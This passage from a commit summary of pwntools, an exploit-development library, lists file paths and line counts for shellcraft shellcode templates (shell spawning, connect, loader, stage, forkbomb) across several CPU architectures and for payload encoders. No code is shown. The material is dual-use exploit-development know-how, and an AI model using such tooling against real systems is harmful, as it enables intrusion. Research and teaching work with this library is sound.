.../templates/mips/linux/syscall.asm | 106 ++-- .../templates/mips/linux/syslog.asm | 15 + .../shellcraft/templates/mips/linux/tee.asm | 16 + .../shellcraft/templates/mips/linux/time.asm | 13 + .../templates/mips/linux/timer_create.asm | 15 + .../templates/mips/linux/timer_delete.asm | 13 + .../templates/mips/linux/timer_getoverrun.asm | 13 + .../templates/mips/linux/timer_gettime.asm | 14 + .../templates/mips/linux/timer_settime.asm | 16 + .../templates/mips/linux/truncate.asm | 14 + .../templates/mips/linux/truncate64.asm | 14 + .../templates/mips/linux/ulimit.asm | 14 + .../shellcraft/templates/mips/linux/umask.asm | 13 + .../shellcraft/templates/mips/linux/uname.asm | 13 + .../templates/mips/linux/unlink.asm | 13 + .../templates/mips/linux/unlinkat.asm | 15 + .../templates/mips/linux/unshare.asm | 13 + .../shellcraft/templates/mips/linux/ustat.asm | 14 + .../shellcraft/templates/mips/linux/utime.asm | 14 + .../templates/mips/linux/utimensat.asm | 16 + .../templates/mips/linux/utimes.asm | 14 + 
.../shellcraft/templates/mips/linux/vfork.asm | 13 + .../templates/mips/linux/vhangup.asm | 13 + .../templates/mips/linux/vmsplice.asm | 16 + .../shellcraft/templates/mips/linux/wait4.asm | 16 + .../templates/mips/linux/waitid.asm | 16 + .../templates/mips/linux/waitpid.asm | 15 + .../shellcraft/templates/mips/linux/write.asm | 15 + .../templates/mips/linux/writev.asm | 15 + pwnlib/shellcraft/templates/mips/mov.asm | 149 ++++-- pwnlib/shellcraft/templates/mips/nop.asm | 2 + pwnlib/shellcraft/templates/mips/push.asm | 27 ++ pwnlib/shellcraft/templates/mips/pushstr.asm | 111 +++++ pwnlib/shellcraft/templates/mips/setregs.asm | 45 ++ pwnlib/shellcraft/templates/mips/trap.asm | 2 + pwnlib/shellcraft/templates/powerpc/__doc__ | 0 .../templates/powerpc/linux/__doc__ | 0 .../templates/powerpc/linux/accept.asm | 15 + .../templates/powerpc/linux/access.asm | 14 + .../templates/powerpc/linux/acct.asm | 13 + .../templates/powerpc/linux/alarm.asm | 13 + .../templates/powerpc/linux/bind.asm | 15 + .../templates/powerpc/linux/brk.asm | 13 + .../templates/powerpc/linux/chdir.asm | 13 + .../templates/powerpc/linux/chmod.asm | 14 + .../templates/powerpc/linux/chown.asm | 15 + .../templates/powerpc/linux/chroot.asm | 13 + .../templates/powerpc/linux/clock_getres.asm | 14 + .../templates/powerpc/linux/clock_gettime.asm | 14 + .../powerpc/linux/clock_nanosleep.asm | 16 + .../templates/powerpc/linux/clock_settime.asm | 14 + .../templates/powerpc/linux/clone.asm | 17 + .../templates/powerpc/linux/close.asm | 13 + .../templates/powerpc/linux/connect.asm | 15 + .../templates/powerpc/linux/creat.asm | 14 + .../templates/powerpc/linux/dup.asm | 13 + .../templates/powerpc/linux/dup2.asm | 14 + .../templates/powerpc/linux/dup3.asm | 15 + .../templates/powerpc/linux/epoll_create.asm | 13 + .../templates/powerpc/linux/epoll_create1.asm | 13 + .../templates/powerpc/linux/epoll_ctl.asm | 16 + .../templates/powerpc/linux/epoll_pwait.asm | 17 + .../templates/powerpc/linux/epoll_wait.asm | 16 + 
.../templates/powerpc/linux/execve.asm | 15 + .../templates/powerpc/linux/exit.asm | 13 + .../templates/powerpc/linux/faccessat.asm | 16 + .../templates/powerpc/linux/fallocate.asm | 16 + .../templates/powerpc/linux/fchdir.asm | 13 + .../templates/powerpc/linux/fchmod.asm | 14 + .../templates/powerpc/linux/fchmodat.asm | 16 + .../templates/powerpc/linux/fchown.asm | 15 + .../templates/powerpc/linux/fchownat.asm | 17 + .../templates/powerpc/linux/fcntl.asm | 15 + .../templates/powerpc/linux/fdatasync.asm | 13 + .../templates/powerpc/linux/flock.asm | 14 + .../templates/powerpc/linux/fork.asm | 13 + .../templates/powerpc/linux/fstat.asm | 14 + .../templates/powerpc/linux/fstat64.asm | 14 + .../templates/powerpc/linux/fstatat64.asm | 16 + .../templates/powerpc/linux/fsync.asm | 13 + .../templates/powerpc/linux/ftruncate.asm | 14 + .../templates/powerpc/linux/ftruncate64.asm | 14 + .../templates/powerpc/linux/futimesat.asm | 15 + .../templates/powerpc/linux/getcwd.asm | 14 + .../templates/powerpc/linux/getegid.asm | 13 + .../templates/powerpc/linux/geteuid.asm | 13 + .../templates/powerpc/linux/getgid.asm | 13 + .../templates/powerpc/linux/getgroups.asm | 14 + .../templates/powerpc/linux/getitimer.asm | 14 + .../templates/powerpc/linux/getpeername.asm | 15 + .../templates/powerpc/linux/getpgid.asm | 13 + .../templates/powerpc/linux/getpgrp.asm | 13 + .../templates/powerpc/linux/getpid.asm | 13 + .../templates/powerpc/linux/getpmsg.asm | 17 + .../templates/powerpc/linux/getppid.asm | 13 + .../templates/powerpc/linux/getpriority.asm | 14 + .../templates/powerpc/linux/getresgid.asm | 15 + .../templates/powerpc/linux/getresuid.asm | 15 + .../templates/powerpc/linux/getrlimit.asm | 14 + .../templates/powerpc/linux/getrusage.asm | 14 + .../templates/powerpc/linux/getsid.asm | 13 + .../templates/powerpc/linux/getsockname.asm | 15 + .../templates/powerpc/linux/getsockopt.asm | 17 + .../templates/powerpc/linux/gettimeofday.asm | 14 + .../templates/powerpc/linux/getuid.asm | 13 
+ .../templates/powerpc/linux/gtty.asm | 14 + .../templates/powerpc/linux/ioctl.asm | 15 + .../templates/powerpc/linux/ioperm.asm | 15 + .../templates/powerpc/linux/iopl.asm | 13 + .../templates/powerpc/linux/kill.asm | 14 + .../templates/powerpc/linux/lchown.asm | 15 + .../templates/powerpc/linux/link.asm | 14 + .../templates/powerpc/linux/linkat.asm | 17 + .../templates/powerpc/linux/listen.asm | 14 + .../templates/powerpc/linux/lseek.asm | 15 + .../templates/powerpc/linux/lstat.asm | 14 + .../templates/powerpc/linux/lstat64.asm | 14 + .../templates/powerpc/linux/madvise.asm | 15 + .../templates/powerpc/linux/mincore.asm | 15 + .../templates/powerpc/linux/mkdir.asm | 14 + .../templates/powerpc/linux/mkdirat.asm | 15 + .../templates/powerpc/linux/mknod.asm | 15 + .../templates/powerpc/linux/mknodat.asm | 16 + .../templates/powerpc/linux/mlock.asm | 14 + .../templates/powerpc/linux/mlockall.asm | 13 + .../templates/powerpc/linux/mmap.asm | 18 + .../templates/powerpc/linux/mprotect.asm | 15 + .../templates/powerpc/linux/mq_notify.asm | 14 + .../templates/powerpc/linux/mq_open.asm | 15 + .../powerpc/linux/mq_timedreceive.asm | 17 + .../templates/powerpc/linux/mq_timedsend.asm | 17 + .../templates/powerpc/linux/mq_unlink.asm | 13 + .../templates/powerpc/linux/mremap.asm | 17 + .../templates/powerpc/linux/msync.asm | 15 + .../templates/powerpc/linux/munlock.asm | 14 + .../templates/powerpc/linux/munlockall.asm | 13 + .../templates/powerpc/linux/munmap.asm | 14 + .../templates/powerpc/linux/nanosleep.asm | 14 + .../templates/powerpc/linux/nice.asm | 13 + .../templates/powerpc/linux/open.asm | 15 + .../templates/powerpc/linux/openat.asm | 16 + .../templates/powerpc/linux/pause.asm | 13 + .../templates/powerpc/linux/pipe.asm | 13 + .../templates/powerpc/linux/pipe2.asm | 14 + .../templates/powerpc/linux/poll.asm | 15 + .../templates/powerpc/linux/ppoll.asm | 16 + .../templates/powerpc/linux/prctl.asm | 14 + .../templates/powerpc/linux/pread.asm | 16 + 
.../templates/powerpc/linux/preadv.asm | 16 + .../templates/powerpc/linux/prlimit64.asm | 16 + .../templates/powerpc/linux/profil.asm | 16 + .../templates/powerpc/linux/ptrace.asm | 14 + .../templates/powerpc/linux/putpmsg.asm | 17 + .../templates/powerpc/linux/pwrite.asm | 16 + .../templates/powerpc/linux/pwritev.asm | 16 + .../templates/powerpc/linux/read.asm | 15 + .../templates/powerpc/linux/readahead.asm | 15 + .../templates/powerpc/linux/readdir.asm | 13 + .../templates/powerpc/linux/readlink.asm | 15 + .../templates/powerpc/linux/readlinkat.asm | 16 + .../templates/powerpc/linux/readv.asm | 15 + .../templates/powerpc/linux/recv.asm | 16 + .../templates/powerpc/linux/recvfrom.asm | 18 + .../templates/powerpc/linux/recvmmsg.asm | 17 + .../templates/powerpc/linux/recvmsg.asm | 15 + .../powerpc/linux/remap_file_pages.asm | 17 + .../templates/powerpc/linux/rename.asm | 14 + .../templates/powerpc/linux/renameat.asm | 16 + .../templates/powerpc/linux/rmdir.asm | 13 + .../powerpc/linux/sched_get_priority_max.asm | 13 + .../powerpc/linux/sched_get_priority_min.asm | 13 + .../powerpc/linux/sched_getaffinity.asm | 15 + .../powerpc/linux/sched_getparam.asm | 14 + .../powerpc/linux/sched_getscheduler.asm | 13 + .../powerpc/linux/sched_rr_get_interval.asm | 14 + .../powerpc/linux/sched_setaffinity.asm | 15 + .../powerpc/linux/sched_setparam.asm | 14 + .../powerpc/linux/sched_setscheduler.asm | 15 + .../templates/powerpc/linux/sched_yield.asm | 13 + .../templates/powerpc/linux/select.asm | 17 + .../templates/powerpc/linux/sendfile.asm | 16 + .../templates/powerpc/linux/sendfile64.asm | 16 + .../templates/powerpc/linux/setdomainname.asm | 14 + .../templates/powerpc/linux/setgid.asm | 13 + .../templates/powerpc/linux/setgroups.asm | 14 + .../templates/powerpc/linux/sethostname.asm | 14 + .../templates/powerpc/linux/setitimer.asm | 15 + .../templates/powerpc/linux/setpgid.asm | 14 + .../templates/powerpc/linux/setpriority.asm | 15 + .../templates/powerpc/linux/setregid.asm | 
14 + .../templates/powerpc/linux/setresgid.asm | 15 + .../templates/powerpc/linux/setresuid.asm | 15 + .../templates/powerpc/linux/setreuid.asm | 14 + .../templates/powerpc/linux/setrlimit.asm | 14 + .../templates/powerpc/linux/setsid.asm | 13 + .../templates/powerpc/linux/settimeofday.asm | 14 + .../templates/powerpc/linux/setuid.asm | 13 + .../templates/powerpc/linux/sigaction.asm | 15 + .../templates/powerpc/linux/sigaltstack.asm | 14 + .../templates/powerpc/linux/signal.asm | 14 + .../templates/powerpc/linux/sigpending.asm | 13 + .../templates/powerpc/linux/sigprocmask.asm | 15 + .../templates/powerpc/linux/sigreturn.asm | 10 + .../templates/powerpc/linux/sigsuspend.asm | 13 + .../templates/powerpc/linux/splice.asm | 18 + .../templates/powerpc/linux/stat.asm | 14 + .../templates/powerpc/linux/stat64.asm | 14 + .../templates/powerpc/linux/stime.asm | 13 + .../templates/powerpc/linux/stty.asm | 14 + .../templates/powerpc/linux/symlink.asm | 14 + .../templates/powerpc/linux/symlinkat.asm | 15 + .../templates/powerpc/linux/sync.asm | 13 + .../powerpc/linux/sync_file_range.asm | 16 + .../templates/powerpc/linux/syslog.asm | 15 + .../templates/powerpc/linux/tee.asm | 16 + .../templates/powerpc/linux/time.asm | 13 + .../templates/powerpc/linux/timer_create.asm | 15 + .../templates/powerpc/linux/timer_delete.asm | 13 + .../powerpc/linux/timer_getoverrun.asm | 13 + .../templates/powerpc/linux/timer_gettime.asm | 14 + .../templates/powerpc/linux/timer_settime.asm | 16 + .../templates/powerpc/linux/truncate.asm | 14 + .../templates/powerpc/linux/truncate64.asm | 14 + .../templates/powerpc/linux/ulimit.asm | 14 + .../templates/powerpc/linux/umask.asm | 13 + .../templates/powerpc/linux/uname.asm | 13 + .../templates/powerpc/linux/unlink.asm | 13 + .../templates/powerpc/linux/unlinkat.asm | 15 + .../templates/powerpc/linux/unshare.asm | 13 + .../templates/powerpc/linux/ustat.asm | 14 + .../templates/powerpc/linux/utime.asm | 14 + .../templates/powerpc/linux/utimensat.asm | 
16 + .../templates/powerpc/linux/utimes.asm | 14 + .../templates/powerpc/linux/vfork.asm | 13 + .../templates/powerpc/linux/vhangup.asm | 13 + .../templates/powerpc/linux/vmsplice.asm | 16 + .../templates/powerpc/linux/wait4.asm | 16 + .../templates/powerpc/linux/waitid.asm | 16 + .../templates/powerpc/linux/waitpid.asm | 15 + .../templates/powerpc/linux/write.asm | 15 + .../templates/powerpc/linux/writev.asm | 15 + pwnlib/shellcraft/templates/thumb/crash.asm | 12 + pwnlib/shellcraft/templates/thumb/itoa.asm | 75 +++ .../templates/thumb/linux/accept.asm | 15 + .../templates/thumb/linux/access.asm | 14 + .../shellcraft/templates/thumb/linux/acct.asm | 13 + .../templates/thumb/linux/alarm.asm | 13 + .../shellcraft/templates/thumb/linux/bind.asm | 15 + .../shellcraft/templates/thumb/linux/brk.asm | 13 + .../shellcraft/templates/thumb/linux/cat.asm | 25 + .../templates/thumb/linux/chdir.asm | 13 + .../templates/thumb/linux/chmod.asm | 14 + .../templates/thumb/linux/chown.asm | 15 + .../templates/thumb/linux/chroot.asm | 13 + .../templates/thumb/linux/clock_getres.asm | 14 + .../templates/thumb/linux/clock_gettime.asm | 14 + .../templates/thumb/linux/clock_nanosleep.asm | 16 + .../templates/thumb/linux/clock_settime.asm | 14 + .../templates/thumb/linux/clone.asm | 17 + .../templates/thumb/linux/close.asm | 13 + .../templates/thumb/linux/connect.asm | 32 +- .../templates/thumb/linux/creat.asm | 14 + .../shellcraft/templates/thumb/linux/dup2.asm | 14 + .../shellcraft/templates/thumb/linux/dup3.asm | 15 + .../shellcraft/templates/thumb/linux/echo.asm | 14 + .../templates/thumb/linux/epoll_create.asm | 13 + .../templates/thumb/linux/epoll_create1.asm | 13 + .../templates/thumb/linux/epoll_ctl.asm | 16 + .../templates/thumb/linux/epoll_pwait.asm | 17 + .../templates/thumb/linux/epoll_wait.asm | 16 + .../templates/thumb/linux/execve.asm | 26 + .../shellcraft/templates/thumb/linux/exit.asm | 13 + .../templates/thumb/linux/faccessat.asm | 16 + 
.../templates/thumb/linux/fallocate.asm | 16 + .../templates/thumb/linux/fchdir.asm | 13 + .../templates/thumb/linux/fchmod.asm | 14 + .../templates/thumb/linux/fchmodat.asm | 16 + .../templates/thumb/linux/fchown.asm | 15 + .../templates/thumb/linux/fchownat.asm | 17 + .../templates/thumb/linux/fcntl.asm | 15 + .../templates/thumb/linux/fdatasync.asm | 13 + .../templates/thumb/linux/flock.asm | 14 + .../shellcraft/templates/thumb/linux/fork.asm | 13 + .../templates/thumb/linux/forkbomb.asm | 13 + .../templates/thumb/linux/forkexit.asm | 16 + .../templates/thumb/linux/fstat.asm | 14 + .../templates/thumb/linux/fstat64.asm | 14 + .../templates/thumb/linux/fstatat64.asm | 16 + .../templates/thumb/linux/fsync.asm | 13 + .../templates/thumb/linux/ftruncate.asm | 14 + .../templates/thumb/linux/ftruncate64.asm | 14 + .../templates/thumb/linux/futimesat.asm | 15 + .../templates/thumb/linux/getcwd.asm | 14 + .../templates/thumb/linux/getegid.asm | 13 + .../templates/thumb/linux/geteuid.asm | 13 + .../templates/thumb/linux/getgid.asm | 13 + .../templates/thumb/linux/getgroups.asm | 14 + .../templates/thumb/linux/getitimer.asm | 14 + .../templates/thumb/linux/getpeername.asm | 15 + .../templates/thumb/linux/getpgid.asm | 13 + .../templates/thumb/linux/getpgrp.asm | 13 + .../templates/thumb/linux/getpid.asm | 13 + .../templates/thumb/linux/getpmsg.asm | 17 + .../templates/thumb/linux/getppid.asm | 13 + .../templates/thumb/linux/getpriority.asm | 14 + .../templates/thumb/linux/getresgid.asm | 15 + .../templates/thumb/linux/getresuid.asm | 15 + .../templates/thumb/linux/getrlimit.asm | 14 + .../templates/thumb/linux/getrusage.asm | 14 + .../templates/thumb/linux/getsid.asm | 13 + .../templates/thumb/linux/getsockname.asm | 15 + .../templates/thumb/linux/getsockopt.asm | 17 + .../templates/thumb/linux/gettimeofday.asm | 14 + .../templates/thumb/linux/getuid.asm | 13 + .../shellcraft/templates/thumb/linux/gtty.asm | 14 + .../templates/thumb/linux/ioctl.asm | 15 + 
.../templates/thumb/linux/ioperm.asm | 15 + .../shellcraft/templates/thumb/linux/iopl.asm | 13 + .../shellcraft/templates/thumb/linux/kill.asm | 14 + .../templates/thumb/linux/killparent.asm | 17 + .../templates/thumb/linux/lchown.asm | 15 + .../shellcraft/templates/thumb/linux/link.asm | 14 + .../templates/thumb/linux/linkat.asm | 17 + .../templates/thumb/linux/loader.asm | 173 +++++++ .../templates/thumb/linux/loader_append.asm | 52 ++ .../templates/thumb/linux/lseek.asm | 15 + .../templates/thumb/linux/lstat.asm | 14 + .../templates/thumb/linux/lstat64.asm | 14 + .../templates/thumb/linux/madvise.asm | 15 + .../templates/thumb/linux/mincore.asm | 15 + .../templates/thumb/linux/mkdir.asm | 14 + .../templates/thumb/linux/mkdirat.asm | 15 + .../templates/thumb/linux/mknod.asm | 15 + .../templates/thumb/linux/mknodat.asm | 16 + .../templates/thumb/linux/mlock.asm | 14 + .../templates/thumb/linux/mlockall.asm | 13 + .../shellcraft/templates/thumb/linux/mmap.asm | 18 + .../shellcraft/templates/thumb/linux/mov.asm | 21 +- .../templates/thumb/linux/mprotect.asm | 15 + .../templates/thumb/linux/mq_notify.asm | 14 + .../templates/thumb/linux/mq_open.asm | 15 + .../templates/thumb/linux/mq_timedreceive.asm | 17 + .../templates/thumb/linux/mq_timedsend.asm | 17 + .../templates/thumb/linux/mq_unlink.asm | 13 + .../templates/thumb/linux/mremap.asm | 17 + .../templates/thumb/linux/msync.asm | 15 + .../templates/thumb/linux/munlock.asm | 14 + .../templates/thumb/linux/munlockall.asm | 13 + .../templates/thumb/linux/munmap.asm | 14 + .../templates/thumb/linux/nanosleep.asm | 14 + .../shellcraft/templates/thumb/linux/nice.asm | 13 + .../shellcraft/templates/thumb/linux/open.asm | 15 + .../templates/thumb/linux/openat.asm | 16 + .../templates/thumb/linux/pause.asm | 13 + .../shellcraft/templates/thumb/linux/pipe.asm | 13 + .../templates/thumb/linux/pipe2.asm | 14 + .../shellcraft/templates/thumb/linux/poll.asm | 15 + .../templates/thumb/linux/ppoll.asm | 16 + 
.../templates/thumb/linux/prctl.asm | 14 + .../templates/thumb/linux/pread.asm | 16 + .../templates/thumb/linux/preadv.asm | 16 + .../templates/thumb/linux/prlimit64.asm | 16 + .../templates/thumb/linux/profil.asm | 16 + .../templates/thumb/linux/ptrace.asm | 14 + .../shellcraft/templates/thumb/linux/push.asm | 23 +- .../templates/thumb/linux/putpmsg.asm | 17 + .../templates/thumb/linux/pwrite.asm | 16 + .../templates/thumb/linux/pwritev.asm | 16 + .../shellcraft/templates/thumb/linux/read.asm | 15 + .../templates/thumb/linux/readahead.asm | 15 + .../templates/thumb/linux/readdir.asm | 13 + .../templates/thumb/linux/readlink.asm | 15 + .../templates/thumb/linux/readlinkat.asm | 16 + .../templates/thumb/linux/readn.asm | 23 + .../templates/thumb/linux/readv.asm | 15 + .../shellcraft/templates/thumb/linux/recv.asm | 16 + .../templates/thumb/linux/recvfrom.asm | 18 + .../templates/thumb/linux/recvmmsg.asm | 17 + .../templates/thumb/linux/recvmsg.asm | 15 + .../thumb/linux/remap_file_pages.asm | 17 + .../templates/thumb/linux/rename.asm | 14 + .../templates/thumb/linux/renameat.asm | 16 + .../templates/thumb/linux/rmdir.asm | 13 + .../thumb/linux/sched_get_priority_max.asm | 13 + .../thumb/linux/sched_get_priority_min.asm | 13 + .../thumb/linux/sched_getaffinity.asm | 15 + .../templates/thumb/linux/sched_getparam.asm | 14 + .../thumb/linux/sched_getscheduler.asm | 13 + .../thumb/linux/sched_rr_get_interval.asm | 14 + .../thumb/linux/sched_setaffinity.asm | 15 + .../templates/thumb/linux/sched_setparam.asm | 14 + .../thumb/linux/sched_setscheduler.asm | 15 + .../templates/thumb/linux/sched_yield.asm | 13 + .../templates/thumb/linux/select.asm | 17 + .../templates/thumb/linux/sendfile.asm | 16 + .../templates/thumb/linux/sendfile64.asm | 16 + .../templates/thumb/linux/setdomainname.asm | 14 + .../templates/thumb/linux/setgid.asm | 13 + .../templates/thumb/linux/setgroups.asm | 14 + .../templates/thumb/linux/sethostname.asm | 14 + .../templates/thumb/linux/setitimer.asm | 
15 + .../templates/thumb/linux/setpgid.asm | 14 + .../templates/thumb/linux/setpriority.asm | 15 + .../templates/thumb/linux/setregid.asm | 14 + .../templates/thumb/linux/setresgid.asm | 15 + .../templates/thumb/linux/setresuid.asm | 15 + .../templates/thumb/linux/setreuid.asm | 14 + .../templates/thumb/linux/setrlimit.asm | 14 + .../templates/thumb/linux/setsid.asm | 13 + .../templates/thumb/linux/settimeofday.asm | 14 + .../templates/thumb/linux/setuid.asm | 13 + .../shellcraft/templates/thumb/linux/sh.asm | 21 +- .../templates/thumb/linux/sigaction.asm | 15 + .../templates/thumb/linux/sigaltstack.asm | 14 + .../templates/thumb/linux/signal.asm | 14 + .../templates/thumb/linux/sigpending.asm | 13 + .../templates/thumb/linux/sigprocmask.asm | 15 + .../templates/thumb/linux/sigreturn.asm | 10 + .../templates/thumb/linux/sigsuspend.asm | 13 + .../templates/thumb/linux/splice.asm | 18 + .../templates/thumb/linux/stage.asm | 62 +++ .../shellcraft/templates/thumb/linux/stat.asm | 14 + .../templates/thumb/linux/stat64.asm | 14 + .../templates/thumb/linux/stime.asm | 13 + .../shellcraft/templates/thumb/linux/stty.asm | 14 + .../templates/thumb/linux/symlink.asm | 14 + .../templates/thumb/linux/symlinkat.asm | 15 + .../shellcraft/templates/thumb/linux/sync.asm | 13 + .../templates/thumb/linux/sync_file_range.asm | 16 + .../templates/thumb/linux/syscall.asm | 27 +- .../templates/thumb/linux/syslog.asm | 15 + .../shellcraft/templates/thumb/linux/tee.asm | 16 + .../shellcraft/templates/thumb/linux/time.asm | 13 + .../templates/thumb/linux/timer_create.asm | 15 + .../templates/thumb/linux/timer_delete.asm | 13 + .../thumb/linux/timer_getoverrun.asm | 13 + .../templates/thumb/linux/timer_gettime.asm | 14 + .../templates/thumb/linux/timer_settime.asm | 16 + .../templates/thumb/linux/truncate.asm | 14 + .../templates/thumb/linux/truncate64.asm | 14 + .../templates/thumb/linux/ulimit.asm | 14 + .../templates/thumb/linux/umask.asm | 13 + .../templates/thumb/linux/uname.asm | 13 + 
.../templates/thumb/linux/unlink.asm | 13 + .../templates/thumb/linux/unlinkat.asm | 15 + .../templates/thumb/linux/unshare.asm | 13 + .../templates/thumb/linux/ustat.asm | 14 + .../templates/thumb/linux/utime.asm | 14 + .../templates/thumb/linux/utimensat.asm | 16 + .../templates/thumb/linux/utimes.asm | 14 + .../templates/thumb/linux/vfork.asm | 13 + .../templates/thumb/linux/vhangup.asm | 13 + .../templates/thumb/linux/vmsplice.asm | 16 + .../templates/thumb/linux/wait4.asm | 16 + .../templates/thumb/linux/waitid.asm | 16 + .../templates/thumb/linux/waitpid.asm | 15 + .../templates/thumb/linux/write.asm | 15 + .../templates/thumb/linux/writev.asm | 15 + pwnlib/shellcraft/templates/thumb/memcpy.asm | 19 + pwnlib/shellcraft/templates/thumb/mov.asm | 148 ++++-- pwnlib/shellcraft/templates/thumb/popad.asm | 6 + pwnlib/shellcraft/templates/thumb/push.asm | 46 +- pwnlib/shellcraft/templates/thumb/pushad.asm | 6 + pwnlib/shellcraft/templates/thumb/pushstr.asm | 40 +- pwnlib/shellcraft/templates/thumb/setregs.asm | 43 ++ pwnlib/shellcraft/templates/thumb/to_arm.asm | 23 + pwnlib/shellcraft/templates/thumb/trap.asm | 2 + pwnlib/shellcraft/templates/thumb/udiv_10.asm | 18 + pwnlib/tubes/process.py | 10 +- pwnlib/tubes/tube.py | 4 +- pwnlib/util/fiddling.py | 57 ++- pwnlib/util/getdents.py | 57 +++ 1656 files changed, 27374 insertions(+), 858 deletions(-) create mode 100644 pwnlib/args.py create mode 100644 pwnlib/commandline/pwnstrip.py create mode 100644 pwnlib/commandline/scramble.py create mode 100644 pwnlib/constants/cgc/__init__.py create mode 120000 pwnlib/constants/cgc/aarch64.py create mode 120000 pwnlib/constants/cgc/alpha.py create mode 120000 pwnlib/constants/cgc/amd64.py create mode 120000 pwnlib/constants/cgc/arm.py create mode 120000 pwnlib/constants/cgc/i386.py create mode 120000 pwnlib/constants/cgc/ia64.py create mode 120000 pwnlib/constants/cgc/mips.py create mode 120000 pwnlib/constants/cgc/powerpc.py create mode 120000 pwnlib/constants/cgc/powerpc64.py 
create mode 120000 pwnlib/constants/cgc/s390.py create mode 120000 pwnlib/constants/cgc/s390x.py create mode 120000 pwnlib/constants/cgc/sparc.py create mode 120000 pwnlib/constants/cgc/sparc64.py create mode 100644 pwnlib/constants/cgc/thumb.py create mode 120000 pwnlib/data/includes/cgc/aarch64.h create mode 120000 pwnlib/data/includes/cgc/alpha.h create mode 120000 pwnlib/data/includes/cgc/amd64.h create mode 100644 pwnlib/data/includes/cgc/arm.h create mode 120000 pwnlib/data/includes/cgc/i386.h create mode 120000 pwnlib/data/includes/cgc/ia64.h create mode 120000 pwnlib/data/includes/cgc/mips.h create mode 120000 pwnlib/data/includes/cgc/powerpc.h create mode 120000 pwnlib/data/includes/cgc/powerpc64.h create mode 120000 pwnlib/data/includes/cgc/s390.h create mode 120000 pwnlib/data/includes/cgc/s390x.h create mode 120000 pwnlib/data/includes/cgc/sparc.h create mode 120000 pwnlib/data/includes/cgc/sparc64.h create mode 120000 pwnlib/data/includes/cgc/thumb.h create mode 100644 pwnlib/encoders/amd64/delta.py create mode 100755 pwnlib/encoders/arm/alphanumeric/ARM_Instructions.py create mode 100644 pwnlib/encoders/arm/alphanumeric/__init__.py create mode 100755 pwnlib/encoders/arm/alphanumeric/alphanum_byte.py create mode 100644 pwnlib/encoders/arm/alphanumeric/alphanumeric.py create mode 100755 pwnlib/encoders/arm/alphanumeric/builder.py create mode 100755 pwnlib/encoders/arm/alphanumeric/random_funcs.py create mode 100644 pwnlib/encoders/arm/xor.py create mode 100644 pwnlib/encoders/i386/delta.py create mode 100644 pwnlib/encoders/mips/__init__.py create mode 100644 pwnlib/encoders/mips/xor.py create mode 100644 pwnlib/shellcraft/templates/aarch64/__doc__ create mode 100644 pwnlib/shellcraft/templates/aarch64/infloop.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/__doc__ create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/accept.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/access.asm create mode 100644 
pwnlib/shellcraft/templates/aarch64/linux/acct.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/alarm.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/bind.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/brk.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/cat.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/chdir.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/chmod.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/chown.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/chroot.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/clock_getres.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/clock_gettime.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/clock_nanosleep.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/clock_settime.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/clone.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/close.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/connect.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/creat.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/dup.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/dup2.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/dup3.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/echo.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/epoll_create.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/epoll_create1.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/epoll_ctl.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/epoll_pwait.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/epoll_wait.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/execve.asm create mode 100644 
pwnlib/shellcraft/templates/aarch64/linux/exit.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/faccessat.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/fallocate.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/fchdir.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/fchmod.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/fchmodat.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/fchown.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/fchownat.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/fcntl.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/fdatasync.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/flock.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/fork.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/forkexit.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/fstat.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/fstat64.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/fstatat64.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/fsync.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/ftruncate.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/ftruncate64.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/futimesat.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/getcwd.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/getegid.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/geteuid.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/getgid.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/getgroups.asm create mode 100644 pwnlib/shellcraft/templates/aarch64/linux/getitimer.asm create mode 100644 